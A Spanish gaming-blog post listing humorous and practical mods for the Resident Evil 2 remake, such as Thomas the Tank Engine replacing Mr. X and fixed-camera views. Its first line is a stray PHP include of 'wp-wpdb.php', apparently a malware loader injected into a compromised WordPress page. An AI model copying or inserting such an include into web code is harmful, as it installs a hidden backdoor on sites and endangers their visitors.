if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Los mods más curiosos para Resident Evil 2 – La Fortaleza de LeChuck

Los mods más curiosos para Resident Evil 2

El remake de Resident Evil 2 ha sido uno de los maravillosos juegos que abrían 2019. Numerosos jugadores han podido revivir la nostalgia con una de las entregas favoritas de la comunidad. Ahora que han pasado unas semanas, el survival horror de Capcom está en el punto de mira de los modders, quienes están creando contenidos bastante… curioso.

No os penséis que son mods cutre salchicheros, los modders detrás del juego son desarrolladores con talento y sus creaciones dan el pego. Veamos qué hay por ahí suelto.

Mr. X como Thomas La Locomotora

Quizá hayáis oído hablar de la clásica serie infantil Thomas and Friends. En ella se narraban las aventuras de diferentes tipos de locomotora en episodios de escasos minutos de duración. Pues bien, el usuario «zombiAli» pensó que una persecución de Thomas por toda la comisario podía ser igual o más terrorífica que la de Mr. X. Observad en este video cómo Claire es acosada sin descanso por la locomotora feliz mientras esta va haciendo sus silbidos y atropellos constantes.

Mr. X y Leon como strippers

¡Ay, los míticos mods que desnudan a los personajes! Todo un clásico del videojuego. Leon y Mr. X tienen dos cuerpazos esculpidos con tesón en el gimnasio, ¿por qué no lucirlos ante el jugador? Nuestros dos amigos se lo pasan muy bien jugando al corre que te pillo en tanga en esta nueva versión erótico-festiva del título. ¿Qué pasará si le atrapa Mr. X? Quizá en el video se desvele.

https://www.youtube.com/watch?v=lX2zMBXNqR8

Un zombi en el papel de protagonista

No todos los zombis son tontos, ni todos los tontos son zombis. O algo así. El caso es que estos pobres e ignorados seres también tienen derecho a conducir la historia. Déjate del típico personaje de la saga y ayuda al zombi a tener sus minutos de gloria. Demuestra que te queda un gramo de cerebro resolviendo puzles, mata a los tuyos y destruye a tus codiciosos creadores. Oye, menuda satisfacción, ¿no?

Jugar con Chris Redfield

Claire andaba buscando a su hermanito y resulta que ya está pegando tiros por la comisaria. Si deseas que Chris deje sus vacaciones y el pendoneo, puedes arrastrarlo a Resident Evil 2 como protagonista. Quizá es hora de que vuelva a la acción, que se nos oxida.

Cámaras fijas y cámara en primera persona

No todo va a ser cachondeo. Puede que algunos nostálgicos no soporten la cámara al hombro del remake y les gustaría disfrutar de la vista tradicional. Pues para estos va dirigido el mod que añade los clásicos planos que limitaban nuestra misión. Aunque, tal vez tú seas de los que prefieren una visión en primera persona al estilo de Resident Evil 7, pues pincha aquí.

***

Esta es solo una pequeña parte del los mods que hay por ahí circulando. Si queréis más solo tenéis que lanzaros a Google y descubrir todo lo que se está cociendo. La actividad modder alrededor de un título como Resident Evil 2 es muy alta, y seguro que en las próximas semanas vemos más contenido curioso. Estaremos atentos.

Por Arashi

Aparte de patear traseros de piratas como gobernadora en Mêlée, soy una fanática de los videojuegos desde que de pequeña me regalaron la Atari 2600. Adoro las aventuras gráficas y los RPG, pero no le hago ascos al resto. Otra de mis pasiones es todo lo relacionado con Japón.

Dejar un comentario